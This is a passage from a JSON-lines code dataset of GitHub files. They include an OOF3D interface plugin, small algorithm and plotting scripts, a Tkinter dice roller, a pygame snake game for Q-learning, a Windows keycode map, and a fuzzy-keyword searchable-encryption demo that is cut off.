self.__class__!=other.__class__:\n## return 0\n## return ((self._interface1==other._interface1 and \\\n## self._interface2==other._interface2) or\n## (self._interface1==other._interface2 and\n## self._interface2==other._interface1))\n #This function is used by the mesh construction function to test\n #whether a skeleton segment is part of the interface.\n def getAdjacentElements(self,seg,skelctxt):\n # TODO OPT: This loop returns the first element-set where it gets\n # a hit -- this is fine as long as there is only one that will\n # do this. Is this in fact the case?\n for interfaceobj in self.namedinterfaces.values():\n els = interfaceobj.getAdjacentElements(seg,skelctxt)\n if els:\n return els\n return AdjacentElements()\n def hasBulkMaterial(self,bulkmatname):\n for interfaceobj in self.namedinterfaces.values():\n if interfaceobj.hasBulkMaterial(bulkmatname):\n return 1\n return 0\n def renameBulkMaterial(self,oldname,newname):\n numrenamed=0\n for interfaceobj in self.namedinterfaces.values():\n if interfaceobj.renameBulkMaterial(oldname,newname):\n numrenamed+=1\n return numrenamed\n def hasInterface(self,interfacename):\n for name, obj in self.namedinterfaces.items():\n if obj.hasInterface(interfacename):\n return 1\n if name==interfacename:\n return 1\n return 0\n def renameInterface(self,oldname,newname):\n interfacenames=self.namedinterfaces.keys()[:]\n for name in interfacenames:\n obj=self.namedinterfaces[name]\n obj.renameInterface(oldname,newname)\n if name==oldname:\n del self.namedinterfaces[oldname]\n self.namedinterfaces[newname]=obj\n\nregisteredclass.Registration(\n \"Union of named interfaces\",\n InterfaceDef,\n UnionInterface,\n ordering=100,\n params = [\n interfaceparameters.ListOfInterfacesParameter(\"interfaces\",\n tip=\"Current list of interfaces defined in this microstructure.\"),\n ],\n tip=\"Define an interface from a union of named interfaces.\",\n discussion = \"\"\"\n\n The object constructed from this class represents an interface consisting of\n the union of a list of interfaces.\n\n \"\"\"\n )\n\n## Define a Microstructure IO PlugIn so that Interfaces\n## will be written to Microstructure data files.\n\n#OOF.LoadData.Microstructure.Interface.New is defined in interfacemenu.py\n#OOF.LoadData.Material.Interface.Assign is defined in materialmenu.py\n\ndef writeInterface(datafile, mscontext):\n #Interface branch\n #TODO 3.1: The bulk materials that define the interfaces must be written,\n #even if the material is not assigned to pixels.\n #Interface materials are not assigned to pixels. They must be\n #explicitly listed here.\n msobj=mscontext.getObject()\n interfacemsplugin=msobj.getPlugIn(\"Interfaces\")\n for interfacename, interfacedef in interfacemsplugin.namedinterfaces.items():\n datafile.startCmd(OOF.LoadData.Microstructure.Interface.New)\n datafile.argument('microstructure',msobj.name())\n datafile.argument('name',interfacename)\n datafile.argument('interface_type',interfacedef)\n datafile.endCmd()\n\n #Write interface properties and materials.\n #An interface material is saved only if it has been assigned to\n #an interface.\n materialmenu.writeMaterials(datafile,\n [materialmanager.getMaterial(m)\n for m in interfacemsplugin.getInterfaceMaterials()])\n\n #Assign interface materials to interfaces\n for matname, interfacenames in interfacemsplugin._materialassignments.items():\n if len(interfacenames)==0:\n continue\n## datafile.startCmd(OOF.LoadData.MaterialandType)\n## datafile.argument('name',matname)\n## matobj=materialmanager.getMaterial(matname)\n## datafile.argument('properties', [prop.registration().name()\n## for prop in matobj.properties()])\n## datafile.argument('materialtype',matobj.type())\n## datafile.endCmd()\n datafile.startCmd(OOF.LoadData.Material.Interface.Assign)\n datafile.argument('microstructure',msobj.name())\n datafile.argument('material',matname)\n datafile.argument('interfaces',interfacenames)\n datafile.endCmd()\n\nif runtimeflags.surface_mode:\n microstructureIO.registerMicrostructureIOPlugIn_last(writeInterface)\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/interfaceplugin.py","file_name":"interfaceplugin.py","file_ext":"py","file_size_in_byte":45399,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"23661017614","text":"'''\nhttps://www.acmicpc.net/problem/9375\n쉽게 생각하자.\n종류 1개 -> 아무것도 안고를 때 + 종류의 수 -> n+1\n\n(n+1) * 종류의 수 - 하나도 고르지 않았을 때\n'''\ncase = int(input())\nfor i in range(case):\n n = int(input())\n type_dict = {}\n for _ in range(n):\n name = input().split()[-1]\n num = type_dict.get(name, 1)\n type_dict[name] = num + 1\n arr = list(type_dict.values())\n rs = 1\n for i in arr:\n rs *= i\n print(rs-1)\n\n\n","repo_name":"LazyerIJ/Algorithm","sub_path":"Problem/BakJoon/Math_3/bj_9375.py","file_name":"bj_9375.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19111950477","text":"import numpy as np\nimport itertools\nimport scipy.spatial as sp\nfrom resamvo.voronoi_multi import voronoi_cell_points_multi\n\ndef in_box(points_original, bounding_box):\n points = points_original.copy()\n return np.all(np.logical_and(bounding_box[:,0] <= points, points <= bounding_box[:,1]), axis=1)\n\ndef voronoi_finite_cell_points(points_original, points_target,bounding_box):\n points = points_original.copy()\n n_points, dim_points = points.shape\n in_box_index = in_box(points, bounding_box)\n # Mirror points\n points_center = points[in_box_index]\n points_all = points_center.copy()\n for i in range(dim_points):\n points_mirror_low = points_center.copy()\n points_mirror_high = points_center.copy()\n points_mirror_low[:,i] = bounding_box[i,0] - (points_mirror_low[:,i] - bounding_box[i,0])\n points_mirror_high[:,i] = bounding_box[i,1] + (bounding_box[i,1] - points_mirror_high[:,i])\n points_all = np.concatenate((points_all, points_mirror_low,points_mirror_high), axis=0)\n # Compute Voronoi\n vor = sp.Voronoi(points_all)\n filtered_points = points_center\n filtered_regions = list(map(vor.regions.__getitem__, vor.point_region[:n_points]))\n filtered_regions_flat = list(itertools.chain.from_iterable(filtered_regions))\n if (-1 in filtered_regions_flat):\n print(\"Warning: Some cells are open\")\n print(\"Number of open cells: \", filtered_regions_flat.count(-1))\n return None\n cell_vertices = [vor.vertices[filtered_regions[i],:] for i in range(n_points)]\n cell_sdss_nums = voronoi_cell_points_multi(cell_vertices,points_target)\n return cell_sdss_nums\n \ndef voronoi_resample_num_ratio(source_df, target_df, match_prop):\n source_df_copy = source_df.copy()\n target_df_copy = target_df.copy()\n source_prop = source_df.loc[:,match_prop].values\n target_prop = target_df.loc[:,match_prop].values\n n_source, n_dim_source = source_prop.shape\n n_target, n_dim_target = target_prop.shape\n assert n_dim_source == n_dim_target\n # Compute bounding box\n bounding_box_mins = source_df_copy.min()[match_prop].values.reshape(n_dim_source,1)\n bounding_box_maxs = source_df_copy.max()[match_prop].values.reshape(n_dim_source,1)\n bounding_box =np.concatenate((bounding_box_mins, bounding_box_maxs), axis=1)\n # Compute nums in Voronoi cells\n cell_target_nums = voronoi_finite_cell_points(source_prop, target_prop,bounding_box)\n return cell_target_nums","repo_name":"Abrygzy/resamvo","sub_path":"resamvo/voronoi_resample.py","file_name":"voronoi_resample.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42075832190","text":"# mypy: ignore-errors\nimport traceback\nfrom typing import Optional\n\nfrom rlo.compare_runs import compare_reps_within_run\nfrom rlo.experiment_result import load_events_from_config\nfrom rlo.expr_sets import ExpressionSet\nfrom rlo.extra_plots import extra_plots\nfrom rlo.plot_clustering_summary import plot_clustering_summary_from_config\nfrom rlo.plot_costs import plot_costs_from_config\nfrom rlo.plot_rollouts import plot_success_from_config\nfrom rlo.plot_dataset_summary import plot_dataset_summary_from_config\nfrom rlo.plot_dataset_overlap import plot_dataset_overlap_from_config\nfrom rlo.plot_empirical_animated import plot_empirical_animated_from_config\nfrom rlo.plot_empirical_predicted_values import (\n plot_empirical_predicted_values_from_config,\n)\nfrom rlo.plot_intra_gen_loss import plot_intra_gen_loss_animated_from_config\nfrom rlo.plot_rewrite_sequences import plot_rewrite_sequences_from_config\nfrom rlo.plot_ray_tasks import plot_ray_tasks_from_config\nfrom rlo.plot_train_summary import plot_train_loss_from_config\nfrom rlo.plot_search_summary import plot_search_summary_from_config\nfrom rlo.print_best_episodes import output_best_episodes_from_config\nfrom rlo.plot_merging_across_generations import (\n plot_merging_across_generations_from_config,\n)\nfrom rlo.plot_time_lefts_during_search import plot_time_lefts_during_search_from_config\nfrom rlo.plot_state_values_animated import plot_state_values_animated_from_config\nfrom rlo.plot_scatter_fitted import plot_scatter_fitted_from_config\nfrom rlo.reporting import azureml, cosmosdb\nfrom rlo.save_rlo_to_ksc import save_rlo_to_ksc_from_config\nfrom plot_success import plot_success_summary_from_config\n\nimport functools\n\n\ndef summarize_logs(\n config, eval_exprs: Optional[ExpressionSet] = None, loglevel=1, ray=False\n):\n\n # Plots that require logs of verbosity >= 1\n verbose_plots = [\n plot_empirical_predicted_values_from_config,\n plot_empirical_animated_from_config,\n plot_intra_gen_loss_animated_from_config,\n plot_dataset_summary_from_config,\n plot_dataset_overlap_from_config,\n plot_scatter_fitted_from_config,\n ] + [extra_plots[plot_name] for plot_name in config[\"extra_plots\"]]\n if config[\"train_search\"] in [\"astar\", \"beam\", \"hybrid\"]:\n verbose_plots.append(\n functools.partial(plot_time_lefts_during_search_from_config, phase=\"train\")\n )\n if config[\"eval_search\"] in [\"astar\", \"beam\", \"hybrid\"]:\n verbose_plots.append(\n functools.partial(plot_time_lefts_during_search_from_config, phase=\"eval\")\n )\n\n # Plots that only require logs of verbosity == 0\n non_verbose_plots = [\n plot_costs_from_config,\n plot_train_loss_from_config,\n plot_search_summary_from_config,\n plot_state_values_animated_from_config,\n output_best_episodes_from_config,\n plot_success_summary_from_config,\n ]\n # add conditional non-verbose plots\n if config[\"num_episode_clusters\"] > 0:\n non_verbose_plots.append(plot_clustering_summary_from_config)\n if config[\"eval_search\"] == \"astar\":\n non_verbose_plots.append(plot_rewrite_sequences_from_config)\n if \"best_across_generations_refiner\" in config[\"dataset_refiners\"]:\n non_verbose_plots.append(plot_merging_across_generations_from_config)\n if ray:\n non_verbose_plots.append(plot_ray_tasks_from_config)\n if config[\"eval_search\"] == \"rollout\":\n # These plots are about frequency of rollouts defined by softmax policy, so not applicable to A*\n non_verbose_plots.append(plot_success_from_config)\n if config[\"eval_search\"] == \"rollout\":\n non_verbose_plots.append(\n functools.partial(plot_costs_from_config, frequency_x_scale=\"generation\")\n )\n\n # verbose events are potentially very large, so this loads them only lazily\n verbose_events = load_events_from_config(config, verbosity=loglevel)\n\n # Store the exceptions themselves as well as tracebacks so that they're accessible\n # to the debugger\n exception_list = []\n exception_traceback_list = []\n if loglevel >= 1:\n for pl in verbose_plots:\n try:\n pl(config, events=verbose_events)\n except Exception as e:\n exception_traceback_list.append(\"\".join(traceback.format_exc()))\n exception_list.append(e)\n\n # verbosity=0 events are much smaller\n # load into memory with `list` for faster repeated iteration\n events = list(load_events_from_config(config, verbosity=0))\n for pl in non_verbose_plots:\n try:\n pl(config, events=events)\n except Exception as e:\n exception_traceback_list.append(\"\".join(traceback.format_exc()))\n exception_list.append(e)\n\n # Log metrics to Azure ML\n azureml.log_all_metrics(config, events)\n\n if config[\"template_path\"] is not None:\n save_rlo_to_ksc_from_config(\n config, events=events, orig_exprs=dict(eval_exprs.named_exprenvs())\n )\n\n # Upload the run information to Cosmos DB\n # Don't allow interactive authentication as it will fail in QuickTest\n cosmosdb.upload_run_to_db(config, allow_interactive=False)\n\n # Upload models to Azure ML workspace if running in Azure ML\n if config[\"upload_models\"]:\n azureml.upload_locally_saved_models(config)\n\n if config.get(\"seed_all_reps\") is not None:\n compare_reps_within_run(events, sort=ray)\n\n if len(exception_list) > 0:\n raise Exception(\n f\"Some of the plots have not been generated:\\n\"\n \"\\n\".join(exception_traceback_list),\n )\n\n return events\n","repo_name":"microsoft/knossos-ksc","sub_path":"rlo/src/rlo/summarize_logs.py","file_name":"summarize_logs.py","file_ext":"py","file_size_in_byte":5654,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"37"} +{"seq_id":"11669678187","text":"from scipy.integrate import odeint\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\ndef dyn_ode (x, t):\n return dyn_d_avant(t, x)\n\nh = 0.001\ntmax = 10\nT =np.arange (0, tmax, h)\nx0 = np.array([1, 1])\nsolution = odeint(dyn_ode, x0, T)\n\nplt.plot (T, solution)\n\n","repo_name":"Nickeroro/Analyse_Numerique","sub_path":"odeint.py","file_name":"odeint.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35733258885","text":"# Dice Rolling Simulator, 22-July-22\r\n\r\nfrom tkinter import *\r\nimport random\r\n\r\n# Root Settings\r\nroot = Tk()\r\nroot.title(\"Dice Rolling Simulator\")\r\nroot.geometry(\"220x175\")\r\n\r\n\r\n# list to store numbers rolled.\r\nrolled = [0]\r\n\r\n\r\n# __Functionality__\r\ndef rolling():\r\n roll = random.randint(1, 6)\r\n\r\n rolled.append(roll)\r\n\r\n display.delete(0, END)\r\n display.insert(0, str(roll))\r\n\r\n Label(root, text=rolled[-2], font='Tahoma 10 bold').grid(row=4, column=0, sticky=W+E, padx=10)\r\n\r\n# __Layout__\r\n\r\n\r\n# Title for D.R.S:\r\ntitle = Label(root, text=\"Dice Rolling Simulator\", font=('Tahoma', 15))\r\ntitle.grid(row=0, column=0, sticky=W+E, padx=10, pady=10)\r\n\r\n# Display for D.R.S:\r\ndisplay = Entry(root, font=('Tahoma', 10), justify=CENTER)\r\ndisplay.grid(row=1, column=0, sticky=W+E, padx=10, pady=5)\r\n\r\n# Button for D.R.S (to roll):\r\nroll_button = Button(root, text=\"Roll\", font=('Tahoma', 10), command=rolling)\r\nroll_button.grid(row=2, column=0, sticky=W+E, padx=10, pady=5)\r\n\r\n# Last Number Rolled, Title:\r\nlast_number_rolled = Label(root, text=\"Last Number Rolled\", font='Tahoma 10 underline')\r\nlast_number_rolled.grid(row=3, column=0, sticky=W+E, padx=10, pady=(5, 0))\r\n\r\nroot.mainloop()\r\n","repo_name":"SelfTaught-HamzaCodes/Tkinter","sub_path":"Dice_Rolling_Simulator.py","file_name":"Dice_Rolling_Simulator.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1614931559","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 9 13:02:48 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport pygame\r\nimport sys\r\nimport random\r\nfrom pygame import *\r\n\r\n# 以25为单位\r\npixel=25\r\n\r\n# 蛇类\r\nclass Snake(object):\r\n def __init__(self,screen_x,screen_y):\r\n #定义常量\r\n self.direction=2\r\n self.body=[]\r\n self.screen_x=screen_x\r\n self.screen_y=screen_y\r\n\r\n #初始化蛇\r\n for x in range(4):\r\n self.addNode()\r\n\r\n\r\n\r\n # 在前端增加色块\r\n def addNode(self):\r\n #找到蛇的最前端\r\n if self.body:\r\n node = pygame.Rect(self.body[0].left,self.body[0].top,pixel,pixel)\r\n else:\r\n node = pygame.Rect(0,0,pixel,pixel)\r\n if self.direction==1:\r\n node.left-=pixel\r\n elif self.direction==2:\r\n node.left+=pixel\r\n elif self.direction==3:\r\n node.top-=pixel\r\n elif self.direction==4:\r\n node.top+=pixel\r\n self.body.insert(0,node)\r\n\r\n # 删除最后一个块\r\n def delNode(self):\r\n self.body.pop()\r\n\r\n # 死亡判断\r\n def isDead(self):\r\n # 撞墙\r\n if self.body[0].x not in range(self.screen_x):\r\n return True\r\n if self.body[0].y not in range(self.screen_y):\r\n return True\r\n # 咬到自己\r\n if self.body[0] in self.body[1:]:\r\n return True\r\n return False\r\n\r\n # 更新位置\r\n def move(self):\r\n self.addNode()\r\n self.delNode()\r\n\r\n # 改变方向 但是左右、上下不能被逆向改变\r\n def changeDirection(self, curkey):\r\n if (curkey == 1 and self.direction == 2) or (curkey == 2 and self.direction == 1) or (\r\n curkey == 3 and self.direction == 4) or (curkey == 4 and self.direction == 3):\r\n return\r\n self.direction = curkey\r\n\r\n\r\n# 食物类\r\nclass Food:\r\n def __init__(self,screen_x):\r\n self.body = pygame.Rect(-pixel, 0, pixel, pixel)\r\n self.screen_x=screen_x\r\n\r\n def reset(self):\r\n self.body.x = -pixel#隐藏食物\r\n allpos = [pos for pos in range(pixel, self.screen_x-pixel, pixel)]# 不靠墙太近 pixel ~ SCREEN_X-pixel 之间\r\n pos_illegal=True\r\n return random.choice(allpos),random.choice(allpos)\r\n\r\n\r\n#贪吃蛇\r\nclass Game:\r\n def __init__(self,screen):\r\n\r\n #初始化对象\r\n self.screen=screen\r\n self.timer = pygame.time.Clock()\r\n\r\n #初始化常量\r\n self.screen_x=screen.get_size()[0]\r\n self.screen_y = screen.get_size()[1]\r\n self.FPS=60\r\n self.reset_score=True#该标志用于确保score的重置在下一帧才进行\r\n self.isdead_state = False\r\n self.game_over=True\r\n #实例化\r\n self.snake = Snake(screen.get_size()[0], screen.get_size()[1])\r\n self.food = Food(screen.get_size()[0])\r\n\r\n #初始化实例\r\n self.foodReset()\r\n\r\n def frameStep(self, input_actions):\r\n\r\n pygame.event.pump()\r\n reward = 0\r\n terminal = False\r\n\r\n if self.reset_score:\r\n self.score=0\r\n self.reset_score=False\r\n\r\n for event in pygame.event.get():\r\n if event.type == K_ESCAPE or (event.type == KEYDOWN and event.key == K_ESCAPE):\r\n self.game_over=True\r\n pygame.quit()\r\n return 0, 0, -1,self.score\r\n\r\n #转换动作状态(与目前相反方向的按键不能生效)\r\n if input_actions[0] == 1:\r\n self.snake.changeDirection(1)\r\n elif input_actions[1] == 1:\r\n self.snake.changeDirection(2)\r\n elif input_actions[2] == 1:\r\n self.snake.changeDirection(3)\r\n elif input_actions[3] == 1:\r\n self.snake.changeDirection(4)\r\n\r\n # 蛇移动\r\n if not self.snake.isDead():\r\n self.snake.move()\r\n else:\r\n self.__init__(self.screen)\r\n reward = -1\r\n terminal = True\r\n\r\n #判断是否吃到食物\r\n if self.food.body == self.snake.body[0]:\r\n reward = 0.5\r\n self.foodReset()\r\n self.snake.addNode()\r\n self.score+=1\r\n\r\n self.screen.fill((0, 0, 0))\r\n for rect in self.snake.body:\r\n pygame.draw.rect(self.screen, (20, 220, 39), rect, 0)\r\n pygame.draw.rect(self.screen, (136, 0, 21), self.food.body, 0)\r\n\r\n image_data = pygame.surfarray.array3d(pygame.display.get_surface())\r\n pygame.display.update()\r\n self.timer.tick(self.FPS)\r\n\r\n return image_data, reward, terminal,self.score\r\n\r\n def foodReset(self):\r\n food_illegal=True\r\n while food_illegal:\r\n x,y=self.food.reset()\r\n if not (x,y) in [(body.x,body.y) for body in self.snake.body]:\r\n food_illegal=False\r\n self.food.body.x,self.food.body.y=x,y\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"liangzp/DQLearning-Toolbox","sub_path":"greedySnake.py","file_name":"greedySnake.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"37"} +{"seq_id":"4039746042","text":"import spacy\n\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\n\n\nnlp = spacy.load('en_core_web_sm') \n\ndef preprocess(text):\n doc = nlp(text)\n tokens = [token.lemma_ for token in doc if not token.is_stop and not token.is_punct]\n return tokens\n\ndef extract_key_concepts(abstract):\n doc = nlp(abstract)\n key_concepts = [chunk.text for chunk in doc.noun_chunks] \n return key_concepts\n\n\ndef entity_recognition(abstract):\n doc = nlp(abstract)\n entities = [(X.text, X.label_) for X in doc.ents] \n return entities\n\n\ndef generate_weighted_string(text, repeat=3):\n concepts = extract_key_concepts(text)\n entities = entity_recognition(text)\n entities = [e[0] for e in entities] \n weighted_concepts = ' '.join(concepts * repeat)\n weighted_entities = ' '.join(entities * repeat)\n\n\n return ' '.join([' '.join(preprocess(text)), weighted_concepts, weighted_entities])\n\n\ndef link_abstract_sentences_to_paragraphs(abstract, full_text):\n paragraphs = full_text.replace('.\\n','\\b**b').replace('-\\n', '').replace('\\n', ' ').split('\\b**b')\n abstract_sentences = list(nlp(abstract).sents)\n \n abstract_sentences_wo_preprocessing = list(abstract_sentences)\n paragraphs_wo_preprocessing = list(paragraphs)\n \n abstract_sentences = [generate_weighted_string(sentence.text) for sentence in abstract_sentences]\n paragraphs = [generate_weighted_string(para) for para in paragraphs]\n \n # abstract_sentences_wo_preprocessing = \n # paragraphs_wo_preprocessing = {i: paragraph for i, paragraph in enumerate(full_text.split('\\n'))}\n\n corpus = abstract_sentences + paragraphs\n\n vectorizer = TfidfVectorizer()\n\n vectorizer.fit(corpus)\n\n sentence_paragraph_scores = {}\n sentence_paragraph_scores_wo = {}\n for i,sentence in enumerate(abstract_sentences):\n sentence_vector = vectorizer.transform([sentence]).toarray()\n paragraph_scores = {}\n paragraph_scores_wo = {}\n for j,para in enumerate(paragraphs):\n para_vector = vectorizer.transform([para]).toarray()\n similarity = cosine_similarity(sentence_vector, para_vector)\n paragraph_scores[(j,para)] = similarity[0][0] \n paragraph_scores_wo[(j,paragraphs_wo_preprocessing[j])] = similarity[0][0]\n\n sorted_paragraph_scores = sorted(paragraph_scores.items(), key=lambda x: x[1], reverse=True)\n sentence_paragraph_scores[(i,sentence)] = sorted_paragraph_scores[:3]\n sorted_paragraph_scores_wo = sorted(paragraph_scores_wo.items(), key=lambda x: x[1], reverse=True)\n sentence_paragraph_scores_wo[0] = sorted_paragraph_scores_wo[:3]\n \n return sentence_paragraph_scores_wo, paragraphs_wo_preprocessing\n\n\n","repo_name":"kimiayazdani/Abstractionist","sub_path":"main_script.py","file_name":"main_script.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13542991492","text":"\nimport kbd2code.keycodes as keycodes\n\nreplace_map = {\n # Modifiers (L and R prefixes were added)\n # https://www.emacswiki.org/emacs/EmacsKeyNotation\n \"C\": \"CONTROL\",\n \"LC\": \"LCONTROL\",\n \"RC\": \"RCONTROL\",\n \"M\": \"MENU\",\n \"LM\": \"LMENU\",\n \"RM\": \"RMENU\",\n \"S\": \"SHIFT\",\n \"LS\": \"LSHIFT\",\n \"RS\": \"RSHIFT\",\n \"DEL\": \"BACK\",\n \"RET\": \"RETURN\",\n \"SPC\": \"SPACE\",\n \"ESC\": \"ESCAPE\",\n \"TAB\": \"TAB\",\n # Function Keys\n # https://www.gnu.org/software/emacs/manual/html_node/emacs/Function-Keys.html\n # Cursor arrow keys.\n \"left\": \"LEFT\",\n \"up\": \"UP\",\n \"right\": \"RIGHT\",\n \"down\": \"DOWN\",\n # Other cursor repositioning keys\n \"begin\": \"DISABLED\",\n \"end\": \"END\",\n \"home\": \"HOME\",\n \"next\": \"NEXT\",\n \"prior\": \"PRIOR\",\n # Miscellaneous function keys.\n \"select\": \"LAUNCH_MEDIA_SELECT\",\n \"print\": \"PRINT\",\n \"execute\": \"EXECUTE\",\n \"backtab\": \"DISABLED\",\n \"insert\": \"INSERT\",\n \"undo\": \"DISABLED\",\n \"redo\": \"DISABLED\",\n \"clearline\": \"DISABLED\",\n \"insertline\": \"DISABLED\",\n \"deleteline\": \"DISABLED\",\n \"insertchar\": \"DISABLED\",\n \"deletechar\": \"DISABLED\",\n \"clearline\": \"DISABLED\",\n # Numbered function keys (across the top of the keyboard).\n \"f25\": \"DISABLED\",\n \"f26\": \"DISABLED\",\n \"f27\": \"DISABLED\",\n \"f28\": \"DISABLED\",\n \"f29\": \"DISABLED\",\n \"f30\": \"DISABLED\",\n \"f31\": \"DISABLED\",\n \"f32\": \"DISABLED\",\n \"f33\": \"DISABLED\",\n \"f34\": \"DISABLED\",\n \"f35\": \"DISABLED\",\n # Keypad keys (to the right of the regular keyboard), with names or punctuation.\n \"kp-add\": \"ADD\",\n \"kp-subtract\": \"SUBTRACT\",\n \"kp-multiply\": \"MULTIPLY\",\n \"kp-divide\": \"DIVIDE\",\n \"kp-backtab\": \"DISABLED\",\n \"kp-space\": \"DISABLED\",\n \"kp-tab\": \"DISABLED\",\n \"kp-enter\": \"RETURN\",\n \"kp-separator\": \"SEPARATOR\",\n \"kp-decimal\": \"DECIMAL\",\n \"kp-equal\": \"OEM_PLUS\",\n \"kp-prior\": \"PRIOR\",\n \"kp-next\": \"NEXT\",\n \"kp-end\": \"END\",\n \"kp-home\": \"HOME\",\n \"kp-left\": \"LEFT\",\n \"kp-up\": \"UP\",\n \"kp-right\": \"RIGHT\",\n \"kp-down\": \"DOWN\",\n \"kp-insert\": \"INSERT\",\n \"kp-delete\": \"DELETE\",\n # Keypad keys with digits.\n \"kp-0\": \"NUMPAD0\",\n \"kp-1\": \"NUMPAD1\",\n \"kp-2\": \"NUMPAD2\",\n \"kp-3\": \"NUMPAD3\",\n \"kp-4\": \"NUMPAD4\",\n \"kp-5\": \"NUMPAD5\",\n \"kp-6\": \"NUMPAD6\",\n \"kp-7\": \"NUMPAD7\",\n \"kp-8\": \"NUMPAD8\",\n \"kp-9\": \"NUMPAD9\",\n # Keypad PF keys.\n \"kp-f1\": \"DISABLED\",\n \"kp-f2\": \"DISABLED\",\n \"kp-f3\": \"DISABLED\",\n \"kp-f4\": \"DISABLED\",\n}\n\ndef mapped_name(key_name: str) -> str:\n key_name = replace_map.get(key_name, key_name.upper())\n return \"VK_{}\".format(key_name)\n\ndef mapped_key(key_name: str) -> int:\n return getattr(keycodes.win, mapped_name(key_name), keycodes.win.VK_DISABLED)\n","repo_name":"jonchun/ptoys-mapper","sub_path":"keycodes/maps/win_us.py","file_name":"win_us.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42087463812","text":"def two(num):\n if (num == 1):\n return False\n for i in range(2, int((num ** 0.5) + 1)):\n if (num % i == 0):\n return False\n return True\n\n\nlst = list(range(2, 246912))\nans = []\nfor i in lst:\n if two(i):\n ans.append(i)\n\nwhile True:\n answer = 0\n n = int(input())\n if (n == 0):\n break\n for i in ans:\n if (n < i<=n * 2):\n answer += 1\n\n print(answer)","repo_name":"subinmun1997/my_python-for-coding-test","sub_path":"BAEKJOON/solution79.py","file_name":"solution79.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"17694648815","text":"import csv\nimport hashlib\nfrom cryptography.fernet import Fernet\n\n# This project demonstrates searchable encryption method based on fuzzy keyword search\n# Workflow is based on 2010 paper \"Fuzzy Keyword Search over Encrypted Data in Cloud Computing\" by Li et al. \n\n# Return a set of fuzzy keywords for a given word\n# Default edit distance is 1\n# TO DO: customize edit distance\ndef build_fuzzy_keyword_set(word):\n\tfuzzy_keys = []\n\tfuzzy_keys.append(\"*\" + word)\n\tfor i in range(len(word)+1):\n\t\tpattern = word[:i] + \"*\" + word[i+1:]\n\t\tfuzzy_keys.append(pattern)\n\treturn fuzzy_keys\n\n# Apply trapdoor function (substituted with SHA-256 hash) to all given fuzzy keywords \ndef build_trapdoor_set(fuzzy_keys):\n\thashed_fuzzy_keys = []\n\tfor word in fuzzy_keys:\n\t\tm = hashlib.sha256()\n\t\tm.update(str.encode(word))\n\t\thashed_fuzzy_keys.append(m.digest())\n\treturn hashed_fuzzy_keys\n\n# seach index table for all fuzzy matches\ndef search(index, query):\n\tresults = []\n\tfor keyword in query:\n\t\tif keyword in index.keys():\n\t\t\tresults = index[keyword]\n\treturn results\n\ndef update_table(index, ct):\n\tif key in index.keys():\n\t\tindex[key].append(ct)\n\telse:\n\t\tindex[key] = [ct]\n\treturn index\n\ndef write_to_file(index):\n\twith open('index.csv', 'w') as f:\n\t\tfor key in index.keys():\n\t\t\tf.write(\"{},{}\\n\".format(key,index[key]))\n\n# Step 1 - Build encrypted index table and store as csv file\n\n# In the index table keys are hashed fuzzy matches for every keyword\n# Values are encrypted keywords + file IDs\n\nsecret_key = Fernet.generate_key() # Secret key that only user knows but server doesn't\ncipher_suite = Fernet(secret_key) # Choose encryption method to be Fernet\nindex = {}\n\nwith open('unencrypted_data.csv', newline='') as csvfile:\n\treader = csv.DictReader(csvfile)\n\tfor row in reader:\n\t\tkeywords = row['keywords'].split()\n\t\tfor word in keywords:\n\t\t\tfuzzy_keys = build_fuzzy_keyword_set(word)\n\t\t\thashed_fuzzy_keys = build_trapdoor_set(fuzzy_keys)\n\t\t\tfor key in hashed_fuzzy_keys:\n\t\t\t\tplaintext = word + \",\" + row['fid']\n\t\t\t\tciphertext = cipher_suite.encrypt(str.encode(plaintext))\n\t\t\t\tindex = update_table(index, ciphertext)\n\twrite_to_file(index)\n\n\n# Step 2 - Simulate User query\n\nquery = input('Enter your query: ')\n#query = 'machine'\n\n# Apply trapdoor function on all fuzzy matches of a given query\nfuzzy_keys = build_fuzzy_keyword_set(query)\nencrypted_query = build_trapdoor_set(fuzzy_keys)\n\nprint(\"\\nA set of fuzzy keywords: \")\nprint(fuzzy_keys)\n\n# Step 3 - Server compares encrypted query keywords with index table and returns results\n\nprint(\"\\nSearching for results...\")\nresults = search(index, encrypted_query)\nif len(results)==0:\n\tprint(\"No results\")\nelse:\n\tprint(\"\\nServer returned these encrypted file identifiers:\\n\")\n\tprint(results)\n\n# Step 4 - User decrypts results\n\ndecrypted_results = []\nfor ct in results:\n\tdecrypted_results.append(cipher_suite.decrypt(ct))\n\nprint(\"\\nDecrypted file identifiers:\\n\")\nprint(decrypted_results)\n\n# Step 5 - User retrieves relevant files given file IDs\n\n# get a set of file ids\nfids = set()\nfor result in decrypted_results:\n\tresult = result.decode(\"utf-8\")\n\tfid = result.split(',')[-1]\n\tfids.add(fid)\nprint('\\n\\nHere are the results that match your query \"{}\":\\n'.format(query))\n\n#retrieve paper titles that match file ids\nwith open('unencrypted_data.csv', newline='') as 